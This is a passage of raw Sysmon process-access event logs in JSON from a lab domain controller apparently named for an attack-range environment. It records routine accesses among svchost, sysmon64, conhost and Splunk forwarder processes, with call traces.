C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3578,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3579,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3580,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3581,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3582,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3583,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3584,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.689\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-001074880500}\r\nTargetProcessId: 5068\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.689","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-001074880500}","TargetProcessId":"5068","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3585,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.923\r\nSourceProcessGUID: {41C8662E-1FF6-5F25-0000-001074880500}\r\nSourceProcessId: 5068\r\nSourceThreadId: 5072\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.923","SourceProcessGUID":"{41C8662E-1FF6-5F25-0000-001074880500}","SourceProcessId":"5068","SourceThreadId":"5072","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program 